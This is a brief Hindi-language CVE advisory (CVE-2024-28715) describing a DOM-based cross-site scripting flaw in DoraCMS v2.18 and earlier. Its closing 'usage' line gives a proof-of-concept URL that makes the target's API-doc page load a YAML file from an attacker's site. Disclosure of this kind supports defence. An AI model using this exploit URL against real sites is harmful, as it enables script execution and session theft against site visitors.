
[सीवीई आईडी]
CVE-2024-28715
[उत्पाद]
DoraCMS
[संस्करण]
DoraCMS v2.18 और उससे पहले
[समस्या प्रकार]
DOM-आधारित XSS।
[विवरण]
DOraCMS v.2.18 और उससे पहले के संस्करणों में क्रॉस-साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को /app/public/apidoc/oas3/wrap-components/markdown.jsx एंडपॉइंट में markdown0 फ़ंक्शन के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
[उपयोग]
https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml